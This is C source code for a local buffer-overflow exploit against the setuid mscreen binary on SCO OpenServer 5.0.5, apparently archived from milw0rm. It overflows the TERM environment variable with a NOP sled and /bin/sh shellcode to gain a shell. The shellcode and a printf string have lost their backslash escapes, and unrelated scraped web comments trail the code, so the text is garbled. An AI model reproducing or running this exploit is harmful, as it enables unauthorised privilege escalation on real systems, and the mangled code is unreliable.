/* Copyright (c) 2000 ADM */
/* All Rights Reserved */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM */
/* The copyright notice above does not evidence any */
/* actual or intended publication of such source code. */
/* */
/* Title: SCO OpenServer mscreen */
/* Tested under: SCO OpenServer 5.0.5 */
/* By: K2 */
/* Use: gcc -o mscreen sco-mscreen.c */
/* */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shell[] =
/* [email protected] */
"xebx1bx5ex31xdbx89x5ex07x89x5ex0cx88x5ex11x31xc0"
"xb0x3bx8dx7ex07x89xf9x53x51x56x56xebx10xe8xe0xff"
"xffxff/bin/shxaaxaaxaaxaax9axaaxaaxaaxaax07xaa";
#define SIZE 130
#define NOPDEF 40
#define DEFOFF -200
#define EGG 500
const char x86_nop=0x90;
long nop,esp;
long offset=DEFOFF;
char buffer[SIZE];
char egg[EGG];
long get_esp() { __asm__("movl %esp,%eax"); }
int main (int argc, char *argv[]) {
int i;
if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);
else
nop = NOPDEF;
esp = get_esp();
memset(egg,x86_nop,EGG);
memcpy(egg+300, shell, strlen(shell));
memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = 1; i < SIZE-4; i += 4) {
*((int *) &buffer[i]) = esp+offset;
}
memcpy(egg,"HOSTNAME=",9); /* just playin */
memcpy(buffer,"TERM=",5); /* here's the overflow */
putenv(egg);
putenv(buffer);
printf("offset = [0x%x]n",esp+offset);
execl("/usr/bin/mscreen", "mscreen", NULL);
printf("exec failed!n");
return 0;
}
// milw0rm.com [2001-01-26]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666